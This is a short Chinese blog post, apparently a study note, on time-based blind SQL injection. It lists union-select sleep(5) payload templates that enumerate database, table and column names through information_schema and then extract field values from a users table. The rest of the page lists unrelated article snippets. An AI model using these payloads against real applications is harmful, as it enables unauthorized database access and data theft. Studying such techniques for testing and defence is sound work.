SQL注入--根据sleep判断

时间：2022-11-01 19:47:37浏览次数：31

标签：-- union 枚举 sleep SQL table select

找数据库名

1 ' union select sleep(5),2 where database() like '{数据库名称枚举}%';--

union是联合查找数据库，当查询为真是sleep生效‘；--’能注释其余SQL

找表名

1 ' union select sleep(5),2 from information_schema.tables where table_schema ='{数据库名称}' and table_name like '{表名枚举}%';--’

找字段

' union select sleep(5),2 from information_schema.columns where table_schema='{数据库名称}' and table_name='{表名}' and column_name like '{字段枚举}%';--’

找出一个后在后面非

' union select sleep(5),2 from information_schema.columns where table_schema='{数据库名称}' and table_name='{表名}' and column_name like '{字段枚举}%' and column_name !='{已验证字段}';--’

找字段值

' union select sleep(5),2 from users where {已验证字段1}like '{字段1值枚举}%';--

' union select sleep(5),2 from users where{已验证字段1}='{字段1枚举值}'and{已验证字段2}like '{字段2枚举}%';--

标签：--,union,枚举,sleep,SQL,table,select
From： https://www.cnblogs.com/n00b/p/16848885.html

static_cast
......
Spring入门
一、Spring概述介绍Spring框架是一个开源的Java平台，它最初是由RodJohnson编写的，并且于2003年6月首次在Apache2.0许可下发布。Spring是轻量级的框架，其基......
异常处理总结
异常是我们无论在日常学习还是工作时，都会遇到并且为之苦恼的，很多方法进行操作时都可能产生异常。异常是不正常情况，和错误稍有不同，这需要搞清楚，异常是一个运行时可能产生的......
R数据分析：扫盲贴，什么是多重插补
好多同学跑来问，用spss的时候使用多重插补的数据集，怎么选怎么用？是不是简单的选一个做分析？今天写写这个问题。什么时候用多重插补首先回顾下三种缺失机制或者叫缺失类型：......
依赖自动装配
1.Ioc容器根据bean所依赖的资源在容器中自动查找并注入到bean中的过程称为自动装配。2.自动装配方式：按类型（常用）按名称按构造方法不启用自动装配3.装配中使用bean标签......
R机器学习：特征工程与特征选择的介绍
两个月没更新了，没有其它理由，就是懒惰，间接持续性的懒惰，一直持续了2个月，简直懒惰！！！大家的好多的私信也没回就过期回不了了。请大家批评我！！！。看了很多高深的算法之后，实在是看不......
FlinkSQL之Windowing TVF
WindowingTVF在Flink1.13版本之后出现的替代之前的Groupwindow的产物，官网描述其ismorepowerfulandeffective //TVF中的tumble滚动窗口 //tumble(tablesenso......
void USB_Init(uint8_t corenum, uint8_t mode);
/*FunctionPrototypes:*/ /**MainfunctiontoinitializeandstarttheUSBinterface.Onceactive,theUSBinterfacewill * allo......
回溯-子集
组合是无序的，满足方案要求即可，对应不同的题意，有时候元素可以重复，有时候不能重复。排列是有序的，同一批元素可以有多种排列。子集跟上面两种又不同，首先空集是子集，一个元素......
Python第八周
一．实验目的和要求了解Pyhon中常见的异常二．实验环境 python3.1064-bit三．实验过程实例1代码如下：1defdivision():2'''功能：分苹果'''......

SQL注入--根据sleep判断

相关文章

赞助商

阅读排行